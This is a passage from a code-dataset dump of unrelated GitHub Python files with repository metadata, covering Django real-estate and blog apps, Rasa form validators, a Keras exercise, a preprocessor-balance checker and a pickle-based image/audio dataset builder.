#html_message += "<a href=" + url + " style='color: #1155cc;' target=''><font face='Arial, Helvetica, sans-serif'>" + url_text + "</font></a></p>";
#html_message += "<p><font face='Arial, Helvetica, sans-serif'><b>Tagline :</b>" + title_abc + "</font></p>";
#html_message += "<p><p><a href=http://news.ycombinator.com/item?id=" + id_abc + " style='color: #1155cc;' target='_blank'><font face='Arial, Helvetica, sans-serif'>HN Discussions</font></a></p>";
#test(html_message)
| [
"tehn.yit.chin@gmail.com"
] | tehn.yit.chin@gmail.com |
3f46fed101cfe16182efd1f60760d48f44357b84 | 38272cdcd91966bdff868c13b16f0e59a4518972 | /back_python/habitinfo/__init__.py | 7da88d0fb4f278b09bb6b42b79c61b2067ee00b6 | [] | no_license | read-group/habit | 0a84b9c422e7034aaa3f5cc356a84e5b4f90827c | 837164408286fbfe036f245badd153ea29a41f7f | refs/heads/master | 2021-01-11T22:38:37.946129 | 2017-08-26T15:16:20 | 2017-08-26T15:16:20 | 79,004,864 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 52 | py | default_app_config="habitinfo.apps.HabitinfoConfig"
| [
"jiangyong@qq.com"
] | jiangyong@qq.com |
589cb44e6bd250ca99485e8a12bf3737b5cdbe43 | 0d0cf0165ca108e8d94056c2bae5ad07fe9f9377 | /24_Image_Processing_with_Keras_in_Python/2_Using_Convolutions/trainingACNNToClassifyClothingTypes.py | a19cd93f8c468f435f23c4ea61341e3ec4a0d1ca | [] | no_license | MACHEIKH/Datacamp_Machine_Learning_For_Everyone | 550ec4038ebdb69993e16fe22d5136f00101b692 | 9fe8947f490da221430e6dccce6e2165a42470f3 | refs/heads/main | 2023-01-22T06:26:15.996504 | 2020-11-24T11:21:53 | 2020-11-24T11:21:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,121 | py | # Training a CNN to classify clothing types
# Before training a neural network it needs to be compiled with the right cost function, using the right optimizer. During compilation, you can also define metrics that the network calculates and reports in every epoch. Model fitting requires a training data set, together with the training labels to the network.
# The Conv2D model you built in the previous exercise is available in your workspace.
# Instructions
# 100 XP
# Compile the network using the 'adam' optimizer and the 'categorical_crossentropy' cost function. In the metrics list define that the network to report 'accuracy'.
# Fit the network on train_data and train_labels. Train for 3 epochs with a batch size of 10 images. In training, set aside 20% of the data as a validation set, using the validation_split keyword argument.
# Compile the model
model.compile(optimizer='adam',
loss='categorical_crossentropy',
metrics=['accuracy'])
# Fit the model on a training set
model.fit(train_data, train_labels,
validation_split=0.2,
epochs=3, batch_size=10)
| [
"noreply@github.com"
] | noreply@github.com |
cc8d30b530404a6ca46a394b3ec1e689d59b0ef7 | 00db7c7d56619fdf36a86941dda7ee5cac3d61e5 | /rasa/04_forms_test/actions/forms_test_actions.py | 170a9464e3fda21fd509918aa3caa1f907470049 | [] | no_license | persocom01/TestAnaconda | d8926dd239159ddb60a29a28700034260075e0f6 | a8b435f9d82b69752e1782c3089b20c5d9dcf3e2 | refs/heads/master | 2023-07-11T00:44:23.097919 | 2023-06-26T07:21:38 | 2023-06-26T07:21:38 | 213,216,064 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,109 | py | from typing import Any, Text, Dict, List
from rasa_sdk import Action, Tracker, FormValidationAction
from rasa_sdk.executor import CollectingDispatcher
import re
class ValidateAdventurerForm(FormValidationAction):
    """Validates the slots collected by the ``adventurer_form``."""

    def name(self) -> Text:
        return "validate_adventurer_form"

    @staticmethod
    def class_list() -> List[Text]:
        """Allowed character classes (lower case)."""
        return ['fighter', 'knight', 'crusader', 'priest', 'archpriest']

    def validate_name(
        self,
        slot_value: Text,
        dispatcher: CollectingDispatcher,
        tracker: Tracker,
        domain: Dict[Text, Any],
    ) -> Dict[Text, Any]:
        """Accept names of letters/spaces only, starting with a letter."""
        print('validating name')
        # Bugfix: the previous pattern used the range ``A-z`` (which also
        # matches the characters between 'Z' and 'a') and was unanchored at
        # the end, so inputs like "John123" were accepted.  fullmatch now
        # enforces the whole string.
        if re.fullmatch(r'[a-zA-Z][a-zA-Z\s]*', slot_value):
            dispatcher.utter_message(text='noted')
            return {'name': slot_value}
        dispatcher.utter_message(text='names may only contain letters and spaces')
        return {'name': None}

    def validate_age(
        self,
        slot_value: Text,
        dispatcher: CollectingDispatcher,
        tracker: Tracker,
        domain: Dict[Text, Any],
    ) -> Dict[Text, Any]:
        """Accept a non-negative integer age; mark under-16s as minors."""
        print('validating age')
        if re.fullmatch(r'[0-9]+', slot_value):
            dispatcher.utter_message(text='noted')
            return {'age': slot_value, 'minor': float(slot_value) < 16}
        dispatcher.utter_message(text='age can only be a number')
        return {'age': None}

    def validate_class(
        self,
        slot_value: Text,
        dispatcher: CollectingDispatcher,
        tracker: Tracker,
        domain: Dict[Text, Any],
    ) -> Dict[Text, Any]:
        """Accept only classes listed in class_list() (case-insensitive)."""
        print('validating class')
        if slot_value.lower() in self.class_list():
            dispatcher.utter_message(text='noted')
            return {'class': slot_value}
        dispatcher.utter_message(text='choose a valid class')
        return {'class': None}

    def validate_experience(
        self,
        slot_value: Text,
        dispatcher: CollectingDispatcher,
        tracker: Tracker,
        domain: Dict[Text, Any],
    ) -> Dict[Text, Any]:
        """Accept integer experience strictly lower than the validated age."""
        print('validating experience')
        age = float(tracker.get_slot('age'))
        if not re.fullmatch(r'[0-9]+', slot_value):
            # Bugfix: non-numeric input previously fell through the outer
            # ``if`` and returned None implicitly, leaving the form without
            # a validation result and the user without any feedback.
            dispatcher.utter_message(text='experience must be a number')
            return {'experience': None}
        if float(slot_value) < age:
            dispatcher.utter_message(text='noted')
            return {'experience': slot_value}
        dispatcher.utter_message(text='experience must be lower than age')
        return {'experience': None}
| [
"persocom02@gmail.com"
] | persocom02@gmail.com |
b53b9f640ad10415e33abfda982af3f7d1d2238d | 23320e9258952cdfb40574c8543e240d63aa98ec | /realestate/views.py | 7d80304129a4dfe18d45f169ec97bbbb764ae775 | [] | no_license | ijij41/realestate | 615d5007500c474626cfd3c3fdacfa628dde85d2 | 4ecbd7b13b96c3aa6564fd1ee9f1571f61ed3d5f | refs/heads/master | 2020-12-24T12:39:49.017435 | 2018-05-27T15:17:15 | 2018-05-27T15:17:15 | 72,969,056 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,212 | py | # from django.shortcuts import render
#
# # Create your viewclass here.
# from django.viewclass.generic import TemplateView
#
import json
import datetime
from django.views.decorators.csrf import csrf_exempt
from django.core import serializers
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.http import HttpResponseRedirect
from django.http import JsonResponse
from django.shortcuts import render
from django.urls import reverse
from django.views.generic import ListView, DetailView
from realestate.models import Deal, Address
def index(request):
    """Redirect logged-in users to the main page, everyone else to login."""
    if not request.user.is_authenticated():
        return HttpResponseRedirect(reverse("realestate:login"))
    return HttpResponseRedirect(reverse("realestate:main"))
class LV(ListView):
    # Paginated list of deals rendered by the search page (3 per page).
    model = Deal
    template_name = "pages/search.html"
    paginate_by = 3
# class DV(DetailView):
# model = Deal;
# template_name = "pages/detail.html"
def detail(request, bldg_cd):
    """Render the deal history of one building, oldest deal first."""
    deals = Deal.objects.filter(bldg_cd=bldg_cd).order_by('deal_date')
    return render(request, 'pages/detail.html', {'deal_list': deals})
#########################################################################
#for ajax
def get_address_do(request, query_id, query_key):
leads_as_json = get_address(query_id, query_key)
return JsonResponse(leads_as_json) # in case of using custom dic
@csrf_exempt
def get_search(request): ## main function for search
result_as_json = get_search_result(request)
print result_as_json
return JsonResponse(result_as_json) #in case of coverting query set to json
########################################################################
#private function
# def get_search_result(request, page_num):
def get_search_result(request):
########## for debug ##################
# print request.is_ajax()
# print request.method
# print request.body
# print type(request)
#
# print request.__dict__
# print type(request)
# print type(request.body)
# print request
# print "POST:", request.POST
# print "GET:", request.GET
# print "body:", request.body
#
# print "1POst request value", request.POST['si_code']
########################################
house_type = request.POST['house_type']
deal_type = request.POST['deal_type']
si_code = request.POST['si_code']
gu_code = request.POST['gu_code']
dong_code = request.POST['dong_code']
start_year = int(request.POST['start_year'])
start_quarter = int(request.POST['start_quarter'])
end_year = int(request.POST['end_year'])
end_quarter = int(request.POST['end_quarter'])
# https: // datatables.net / manual / server - side # Sent-parameters
# for pagination
table_data_para_start = int(request.POST['start'])
table_data_para_length = int(request.POST['length'])
cur_page = table_data_para_start/table_data_para_length + 1
# 1 1 2 4 3 7 4 10
# year_range = [start_year, end_year],
# https: // stackoverflow.com / questions / 4668619 / django - database - query - how - to - filter - objects - by - date - range
# post_list = Deal.objects.all().filter(house_type=house_type, deal_type=deal_type,
# # si_code = si_code, gu_code=gu_code, dong_code=dong_code,
# deal_date__gte=datetime.date(start_year, (start_quarter*3)-2, 1),deal_date__lte=datetime.date(end_year, (end_quarter*3)-1, 1))
# post_list = Deal.objects.all().filter(deal_date__gte=datetime.date(start_year, (start_quarter*3)-2, 1),deal_date__lte=datetime.date(end_year, (end_quarter*3)-1, 1))
print start_quarter
print end_quarter
# print "start date:" ,datetime.date(start_year, (start_quarter * 3) - 2, 1)
if((((end_quarter + 1) * 3) - 2 ) > 12 ):
end_time = datetime.date(end_year+1, 1, 1)
else:
end_time = datetime.date(end_year, ((end_quarter + 1) * 3) - 2, 1)
print "end date:", end_time
post_list = Deal.objects.filter(deal_date__gte=datetime.date(start_year, (start_quarter * 3) - 2, 1), deal_date__lt=end_time, ).order_by('deal_date')
print post_list.query
#test
# print Deal.objects.filter(year=2016, period=1, dealtype=2).query
# post_list = Deal.objects.filter(year=2016,period=1,dealtype=2)
print "original entry count:", len(post_list)
if(not house_type=='0'):
post_list = post_list.filter(housetype=house_type)
print "select house_type:", house_type, len(post_list)
if(not deal_type=='0'):
post_list = post_list.filter(dealtype=deal_type)
print "select deal_type:", deal_type, len(post_list)
if(not si_code=='0'):
post_list = post_list.filter(sidocode=si_code)
print "select si_code:", si_code, len(post_list)
if (not gu_code == '0'):
post_list = post_list.filter(guguncode=gu_code)
print "select gu_code:", gu_code, len(post_list)
if (not dong_code == '0'):
post_list = post_list.filter(dongcode=dong_code)
print "select dong_code:", dong_code, len(post_list)
# print 'get:', post_list
print "-----------------"
print type(house_type),house_type
print type(deal_type), deal_type
print type(si_code),si_code
print type(gu_code), gu_code
print type(dong_code), dong_code
print "-----------------"
print "filtered entry count:", len(post_list)
# print "test1:", post_list[0].address.si_code
# print "test2:", post_list[0].address.si_name
# num_content_per_page = 10
num_content_per_page = table_data_para_length
paginator = Paginator(post_list, num_content_per_page)
# cur_page = page_num # page_num from url does not be needed because we will use start, length parameter provided from tabledata
try:
contacts = paginator.page(cur_page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
contacts = paginator.page(1)
cur_page = 1
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
contacts = paginator.page(paginator.num_pages)
# general paginate
# page_list = [1, 2, 3, 4, 5]
# previous_page = 0
# next_page = 6
# context = {}
# context['object_list'] = contacts
# context['object_list'] = contacts.object_list
#
# context['page_list'] = page_list #
# context['previous_page'] = previous_page
# context['next_page'] = next_page #
# context['current_page'] = int(cur_page)
# case 1
# test = {'data': [{'content':"aaa",'page_info':{'page_list':[1,2,3,4],'prev_page':0,'next_page':5,'cur_page':3}}] }
# return JsonResponse(test)
# case 2
# data = serializers.serialize("json",contacts.object_list)
# d = ast.literal_eval(data)
# return HttpResponse(data,content_type='application/json')
# case 3
# data = serializers.serialize("json", contacts.object_list)
# context['object_list'] = data
# return JsonResponse(context)
# case 4
# data = serializers.serialize("json", contacts.object_list)
# # context['data'] = data
# # return JsonResponse(context)
# About json http://pythonstudy.xyz/python/article/205-JSON-%EB%8D%B0%EC%9D%B4%ED%83%80
# according to page request, send data (e.g., 2 page reuqest, send page 2 data
data = serializers.serialize("json", contacts.object_list)
dict_data = json.loads(data)
#update from forienkey
for de, pl in zip(dict_data, post_list):
de['fields']['address'] = pl.get_address
#TODO recordsFiltered processing
return {"recordsTotal": post_list.count(), "recordsFiltered": post_list.count(), 'data':dict_data}
def get_address(query_id, query_key):
if (query_id == 'si'):
data_list = Address.objects.all().values('si_code', 'si_name').distinct()
elif (query_id == 'gu'):
data_list = Address.objects.all().values('gu_code', 'gu_name').distinct().filter(
gu_code__startswith=query_key)
elif (query_id == 'dong'):
data_list = Address.objects.all().values('dong_code', 'dong_name').distinct().filter(
dong_code__startswith=query_key)
# c = serializers.serialize('json',data_list,field=('si_code','si_name'))
# print process_data_list
# data_list = [ entry for entry in data_list ] #default for json
process_data_list = []
for entry in data_list:
t_dic = {}
if (query_id == 'si'):
t_dic['code'] = entry['si_code']
t_dic['name'] = entry['si_name']
elif (query_id == 'gu'):
t_dic['code'] = entry['gu_code']
t_dic['name'] = entry['gu_name']
elif (query_id == 'dong'):
t_dic['code'] = entry['dong_code']
t_dic['name'] = entry['dong_name']
process_data_list.append(t_dic)
# process_data_list = serializers.serialize('json',process_data_list)
# return {'data':data_list}
return {'data': process_data_list}
#######################################################################
def init_db_test(request):
data_list = Deal.objects.filter(dongcode=1168010300)[:7]
print "data count: ", len(data_list)
print "data count: ", data_list
print "data count: ", data_list.count
context = {'test_list': data_list}
return render(request, 'realestate/ref_show_data.html', context)
def store_data_db_test(request):
addr = Address(si_code=1, si_name='test', gu_code=2, gu_name="gu_test", dong_code=3, dong_name="dong_test")
addr.save()
print "store data db test"
return render(request, 'realestate/db_insert_done.html')
#
# def signup(request):
# if request.method == "POST":
# userform = UserCreationForm(request.POST)
# if userform.is_valid():
# userform.save()
# return HttpResponseRedirect(reverse("realestate:signup_ok"))
#
# elif request.method == "GET":
# userform = UserCreationForm()
#
# return render(request, "registration/signup.html",{"userform":userform})
# def session_confirm(request):
# print User.get_full_name()
# return None
| [
"ijij41@gmail.com"
] | ijij41@gmail.com |
9eda040374e9676cb11302a44cf81830252b90b8 | 137231b721e0e1d356defc8d649e28c31ef98339 | /resources/git/check_syntax.py | 6441fda3f4aeb0919c44feae3e9a1b16eb7b1308 | [
"Apache-2.0"
] | permissive | devopsec/dsiprouter | 779702b002f95b85a20dda6863966f3b0d0ad1b4 | bab487af5b8460f4da085d4feebeb8dd9b4a572a | refs/heads/master | 2021-04-15T05:45:56.669896 | 2020-11-20T22:52:51 | 2020-11-20T22:52:51 | 126,534,604 | 0 | 0 | Apache-2.0 | 2020-11-20T22:52:52 | 2018-03-23T20:15:16 | HTML | UTF-8 | Python | false | false | 5,198 | py | #!/usr/bin/env python3
import os, sys, re, subprocess, shutil
# TODO: add support for other basic preprocessor checks (c/kamcfg)
# TODO: add support for missing semi-colon / dangling curly brace (c/kamcfg)
# TODO: add support for recursing through kamcfg include files (kamcfg)
# global config variables
project_root = subprocess.Popen(['git', 'rev-parse', '--show-toplevel'], universal_newlines=True,
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL).communicate()[0].strip()
if len(project_root) == 0:
project_root = os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0])))
# find C src files in project
matched_csrc_files = subprocess.Popen(['find', project_root, '-type', 'f', '-regextype', 'posix-extended', '-regex', '.*\.(cpp|hpp|c|h)$'],
universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL).communicate()[0].strip().split()
# find kamailio .cfg files in project
shell_pipe = subprocess.Popen(['find', project_root, '-type', 'f', '-name', '*.cfg', '-print0'],
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL).stdout
matched_kamcfg_files = subprocess.Popen(['xargs', '-0', 'sh', '-c', 'for arg do sed -n "/^\#\!KAMAILIO/q 0;q 1" ${arg} && echo "${arg}"; done', '_'],
universal_newlines=True, stdin=shell_pipe, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL
).communicate()[0].strip().split()
files_found = len(matched_csrc_files) + len(matched_kamcfg_files)
term_width = shutil.get_terminal_size((80, 24))[0]
# global constants
CSRC_STYLE_IFDEF_REGEX = re.compile(rb'^\#if(?:n?def)?')
CSRC_STYLE_ENDIF_REGEX = re.compile(rb'^\#endif')
KAMCFG_STYLE_IFDEF_REGEX = re.compile(rb'^\#if(?:n?def)?')
KAMCFG_STYLE_ENDIF_REGEX = re.compile(rb'^\#endif')
# holds state for entire test
test_succeeded = True
files_checked = 0
# holds state for current file check
current_file = '<no file selected>'
unmatched_ifdefs = []
unmatched_endifs = []
# check for common syntax errors, currently supported checks:
# + preprocessor statement closure
def haveValidSyntax(test_files, syntax='c-src'):
global files_checked, current_file, unmatched_ifdefs, unmatched_endifs
if syntax == 'c-src':
ifdef_regex = CSRC_STYLE_IFDEF_REGEX
endif_regex = CSRC_STYLE_ENDIF_REGEX
elif syntax == 'kam-cfg':
ifdef_regex = KAMCFG_STYLE_IFDEF_REGEX
endif_regex = KAMCFG_STYLE_ENDIF_REGEX
else:
return False
for test_file in test_files:
current_file = test_file
with open(test_file, 'rb') as fp:
i = 1
for line in fp:
if ifdef_regex.match(line):
unmatched_ifdefs.append(i)
elif endif_regex.match(line):
try:
unmatched_ifdefs.pop()
except IndexError:
unmatched_endifs.append(i)
i += 1
files_checked += 1
if len(unmatched_ifdefs) != 0 or len(unmatched_endifs) != 0:
return False
return True
# print summary of test results
def printSummary():
print('|', '='*(term_width-2), '|', sep='')
if test_succeeded:
print('Test Result: PASSED')
else:
print('Test Result: FAILED')
print('Number Of Files Tested: {}'.format(str(files_checked)))
print('Number Of Files Matched: {}'.format(str(files_found)))
print('|', '='*(term_width-2), '|', sep='')
# print detailed failure info
def printErrorInfo():
if not test_succeeded:
if len(unmatched_ifdefs) != 0:
header = 'unmatched ifdefs'
header_len = len(header)
avail_space = term_width - 4 - header_len
header_fill = '=' * (int(avail_space / 2))
header_pad = '=' * (avail_space % 2)
print('|', header_fill, ' '+header+' ', header_fill, header_pad, '|', sep='')
for i in unmatched_ifdefs:
print('{}: line {}'.format(current_file, str(i)), file=sys.stderr)
print('|', '='*(term_width-2), '|', sep='', file=sys.stderr)
if len(unmatched_endifs) != 0:
header = 'unmatched endifs'
header_len = len(header)
avail_space = term_width - 4 - header_len
header_fill = '=' * (int(avail_space / 2))
header_pad = '=' * (avail_space % 2)
print('|', header_fill, ' '+header+' ', header_fill, header_pad, '|', sep='')
for i in unmatched_endifs:
print('{}: line {}'.format(current_file, str(i)), file=sys.stderr)
print('|', '='*(term_width-2), '|', sep='', file=sys.stderr)
# wrapper for the final cleanup
def printResultsAndExit():
printSummary()
printErrorInfo()
sys.exit(int(test_succeeded == False))
# main testing logic
if not haveValidSyntax(matched_csrc_files, syntax='c-src'):
test_succeeded = False
elif not haveValidSyntax(matched_kamcfg_files, syntax='kam-cfg'):
test_succeeded = False
printResultsAndExit()
| [
"tmoore@goflyball.com"
] | tmoore@goflyball.com |
016a771a9a4e9cd6058b345ad25e460998ce2d0a | 78e67caaeb0b6416980c94134b03fa1346205caf | /als/asgi.py | 377726f521b04d55054d6ef3fd60b44c0e042887 | [] | no_license | AhtenYa/alsurlshortener | 91a5838e777b4e0651ad590b146ec882da170f31 | 7b5bac0825c651fdad82a311b7338f13fdf94c23 | refs/heads/main | 2023-07-23T22:58:51.708808 | 2021-09-04T13:06:43 | 2021-09-04T13:06:43 | 368,159,188 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | """
ASGI config for als project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'als.settings')
application = get_asgi_application()
| [
"68775649+AhtenYa@users.noreply.github.com"
] | 68775649+AhtenYa@users.noreply.github.com |
1a23c95c125ef6b9e88bdbe0a914ea803ebafe87 | 9c8801d1a76f37f89671721c346c1911d4197dc1 | /myprofile/urls.py | adfbded9301605158106c79bc5dc9584d8256237 | [] | no_license | hawkeyes64/myproject | 4cc401d7ea57b4b3104c7036bac2bcc42e359476 | 539268817e5dad249471a3508d30973ccaecf5f4 | refs/heads/master | 2021-01-12T09:03:41.300568 | 2017-07-03T16:01:45 | 2017-07-03T16:01:45 | 76,749,005 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py | from django.conf.urls import url
from myprofile import views
app_name = 'myprofile'
urlpatterns = [
url(r'^', views.index, name='index'),
] | [
"wiz.hawkeye64@gmail.com"
] | wiz.hawkeye64@gmail.com |
437df5749492caa79d2bc5ad46c1efce9d4aa163 | b4ef95cc0a33477893ff5322246bba877318bec0 | /blog/models.py | 1da647f996053c5c2cc340832e3d502d69a89243 | [] | no_license | sikiyo2333/blog_project | c5a2ace9d95d407c8b40c162b0d79d484814cd3b | 13fd49d44a6371ac2df2d06ed1c723537dfb62f5 | refs/heads/master | 2016-09-13T12:07:01.437303 | 2016-05-19T11:23:18 | 2016-05-19T11:23:18 | 59,199,614 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,451 | py | # coding=utf-8
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class UserProfile(models.Model):
user = models.OneToOneField(User)
# website = models.URLField(blank=True)
picture = models.ImageField(upload_to='static/profile_images', blank=True)
def __unicode__(self):
return self.user.username
class Article(models.Model):
title = models.CharField(max_length=128, null=True)
summary = models.CharField(max_length=128, null=True)
body = models.TextField()
datetime = models.DateTimeField(auto_now_add=True)
user = models.ForeignKey(UserProfile)
# picture = models.ImageField(upload_to = 'img')
def __unicode__(self):
return self.title
class Comment(models.Model):
body = models.TextField()
datetime = models.DateTimeField(auto_now_add=True)
user = models.ForeignKey(UserProfile)
article = models.ForeignKey(Article)
def __unicode__(self):
return str(self.id)
class News(models.Model): # 新闻表
myurl = models.URLField(max_length=256, null=True) # 来源
picture = models.CharField(max_length=100, null=True) # picture_path
title = models.CharField(max_length=128, unique=True) # 标题
date = models.CharField(max_length=100, null=True) # 生成时间
summary = models.CharField(max_length=100, unique=True) # 概要
def __unicode__(self):
return self.title
| [
"sikiyoo@foxmail.com"
] | sikiyoo@foxmail.com |
66a26920f92185b4242b11c4be51229f86e92299 | e38324a95a3e639afe711476a7cff77c56199bab | /manage.py | 5107fe55cfc70cc993af2b2c40b6da4b0118330c | [] | no_license | sonnenkorona/django_amazon_translate | 30d91e751e447302f5bd1032ac9212340540b345 | b7eaa739aa1202ea0df6e94101e4bbb2911c1f5c | refs/heads/master | 2023-04-12T02:03:08.020708 | 2021-04-15T14:36:07 | 2021-04-15T14:36:07 | 358,287,503 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 670 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'translate_test.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"sonnenkorona@gmail.com"
] | sonnenkorona@gmail.com |
ef0a52a17359b8870ff5afc4a0872d753e9664ba | 1d970480c377f0011b2407804840cbf382792447 | /before_large_application_architecture/db_practice2.py | 990a2e597c0d6573b50f77fa858ec00eeefe828d | [] | no_license | EminentStar/flask-web-oreily | 1893f1d04e2dc11a9901bc5ea26ab84748643a8c | 2f0362daed76102506f256c5a30d27fbc7f61f4b | refs/heads/master | 2021-01-09T05:25:25.877741 | 2017-07-02T22:45:03 | 2017-07-02T22:45:03 | 80,765,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,392 | py | from hello import db
from hello import Role, User
"""
Flask-SQLAlchemy는 각 모델 클래스에서 사용 가능한 query 오브젝트를 생성
"""
# 모델을 위한 가장 기본적 ㄱ쿼리는 그에 대응 하는 테이블의 전체 내용을 리턴하는 것
result = Role.query.all()
print("Role.query.all()")
print(result)
result = User.query.all()
print("User.query.all()")
print(result)
user_role = result[0].role
# 쿼리 오브젝트는 filters를 통해 더 정확한 데이터베이스 검색을 실행하도록 설정함.
# "User" 규칙에 할당된 모든 사용자를 검색
result = User.query.filter_by(role=user_role).all()
print('User.query.filter_by(role=user_role).all()')
print(result)
result = User.query.filter().all()
print('User.query.filter().all()')
print(result)
result = User.query.limit(2).all()
print('User.query.limit(2)')
print(result)
result = User.query.filter_by(role=user_role).first()
print('User.query.filter_by(role=user_role).first()')
print(result)
"""
result = User.query.filter_by(username="test").first_or_404()
print('User.query.filter_by(username="test").first()_or_404')
print(result)
"""
result = User.query.filter_by(role=user_role).count()
print('User.query.filter_by(role=user_role).count()')
print(result)
result = User.query.filter().get(1)
print("User.query.filter().get(1)")
print(result)
"""
result = User.query.filter().get_or_404(5)
print("User.query.filter().get_or_404(5)")
print(result)
"""
"""
# user_role.users 쿼리는 사용자의 리스트를 리턴하기 위해 user_role.users 표현이
# 내부적으로 all()의 호출을 실행할 때 묵시적으로 쿼리가 실행됨
# 그래서 쿼리 오브젝트가 숨겨져 있기 때문에 추가적인 쿼리 필터를 이용하여 개선하는 것을 불가능
users = user_role.users
print(users)
result = user_role.users.order_by(User.username).all() # ERROR!
print('user_role.users.order_by(User.username).all()')
print(result)
"""
"""
# 이걸 해결하기 위해, 관계 설정은 쿼리가 자동으로 실행되지 않도록 리퀘스트하기 위해
# lazy='dynamic'인수로 수정(Role model)
"""
users = user_role.users
print(users)
result = user_role.users.order_by(User.username).all()
print('user_role.users.order_by(User.username).all()')
print(result)
result = user_role.users.count()
print('user_role.users.count()')
print(result)
| [
"junk3843@naver.com"
] | junk3843@naver.com |
546ad423f29df454ce30baa4898f5be35eef9929 | 4eb2b57b1b8f3b68ce44b8a5a967f34d10563b74 | /SimpleFit/api/migrations/0053_auto_20161211_1453.py | 46bc0a58c87f9386fcba490908978f1f9c9d6b9b | [] | no_license | dlellis/SimpleFit | 4c87b2ca682ccc383af78c1edc3447cae208c217 | d38a093d15248685abe0531e34852fe5ae5d692b | refs/heads/master | 2021-05-01T16:30:39.875103 | 2016-12-13T18:09:56 | 2016-12-13T18:09:56 | 71,318,209 | 0 | 3 | null | 2016-12-13T17:54:34 | 2016-10-19T04:15:43 | JavaScript | UTF-8 | Python | false | false | 1,041 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-12-11 14:53
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0052_ecategory_exercise'),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(default=None, max_length=30)),
],
),
migrations.RemoveField(
model_name='exercise',
name='ecategory',
),
migrations.RemoveField(
model_name='exercise',
name='exname',
),
migrations.AddField(
model_name='exercise',
name='name',
field=models.CharField(default=None, max_length=30),
),
migrations.DeleteModel(
name='ECategory',
),
]
| [
"dlellis@unomaha.edu"
] | dlellis@unomaha.edu |
c2a27aebcb39aa364b36e6be6aca69661fe432b4 | 67e4328bd6f0a47aeddd280f2b2a226ada88ef6d | /GUI/static/pickles/create.py | b8b8a09f56b783b0ce66d291daaeddc0638621b8 | [] | no_license | venkat201097/Multimodal | 6a4bb51185086951a5b046ef3c5f5fdced42da29 | 75935db16a8059fb970b78e5cd95f241a5fb7d27 | refs/heads/master | 2020-09-03T12:04:27.532354 | 2020-08-22T05:14:34 | 2020-08-22T05:14:34 | 219,426,213 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,329 | py | import numpy as np
import random
import os
import pickle
buckets = pickle.load(open('buckets.pkl','rb'))
images = pickle.load(open('images.pkl','rb'))
audios = pickle.load(open('audios.pkl','rb'))
#train = pickle.load(open('train_local.pkl','rb'))
img2lab = pickle.load(open('img2lab.pkl','rb'))
#print(train)
for i in images:
images[i] = ['static/images/'+j.split('/')[-1] for j in images[i]]
for i in audios:
audios[i] = ['static/audios/{}/{}'.format(j.split('/')[-2],j.split('/')[-1]) for j in audios[i]]
train2 = []
tempimg0 = []
tempaud0 = []
tempimg3 = []
tempaud3 = []
for x,k in enumerate([1,2,3,1,2,3]):
temp = []
for j in range(k):
for i in buckets[x]:
a = random.sample(images[i],1)[0]
print(a)
del images[i][images[i].index(a)]
b = random.sample(audios[img2lab[i]],1)[0]
del audios[img2lab[i]][audios[img2lab[i]].index(b)]
temp.append((a,b))
if x==0:
tempimg0.append([a])
tempaud0.append([b])
if x==3:
tempimg3.append([a])
tempaud3.append([b])
train2.append(temp)
imgtest = []
audtest = []
for z,bucket in enumerate(buckets):
tempimg = []
tempaud = []
for i in bucket:
a = random.sample(images[i],1)[0]
del images[i][images[i].index(a)]
b = random.sample(audios[img2lab[i]],1)[0]
del audios[img2lab[i]][audios[img2lab[i]].index(b)]
tempimg.append([a,b])
a = random.sample(images[i],1)[0]
del images[i][images[i].index(a)]
b = random.sample(audios[img2lab[i]],1)[0]
del audios[img2lab[i]][audios[img2lab[i]].index(b)]
tempaud.append([b,a])
for x,i in enumerate(bucket):
for y,j in enumerate(random.sample(bucket[:x]+bucket[x+1:],9)):
b = random.sample(audios[img2lab[j]],1)[0]
# del audios[img2lab[j]][audios[img2lab[j]].index(b)]
tempimg[x].append(b)
for y,j in enumerate(random.sample(bucket[:x]+bucket[x+1:],9)):
a = random.sample(images[j],1)[0]
# del images[j][images[j].index(a)]
tempaud[x].append(a)
tempimg[x][1:] = random.sample(tempimg[x][1:],len(tempimg[x][1:]))
tempaud[x][1:] = random.sample(tempaud[x][1:],len(tempaud[x][1:]))
if z==0:
for x,i in enumerate(bucket):
for y,j in enumerate(random.sample(bucket[:x]+bucket[x:],10)):
b = random.sample(audios[img2lab[j]],1)[0]
# del audios[img2lab[j]][audios[img2lab[j]].index(b)]
tempimg0[x].append(b)
for y,j in enumerate(random.sample(bucket[:x]+bucket[x:],10)):
